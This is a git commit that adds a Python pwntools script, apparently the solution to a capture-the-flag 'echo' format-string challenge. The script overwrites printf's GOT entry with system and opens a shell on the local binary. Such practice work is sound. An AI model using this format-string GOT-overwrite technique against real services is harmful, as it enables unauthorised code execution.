Finished format-string/echo

2021-09-14 12:31:15 +08:00
parent 15ab81a884
commit 23eca8a37f
4 changed files with 59 additions and 0 deletions
--- a/format-string/echo/answer_echo.py
+++ b/format-string/echo/answer_echo.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./echo')
+elf = ELF('./echo')
+
+printf_got = elf.got['printf']
+system_plt = elf.plt['system']
+
+payload = fmtstr_payload(7, {printf_got: system_plt})
+
+p.sendline(payload)
+p.sendline("/bin/sh")
+p.interactive()
+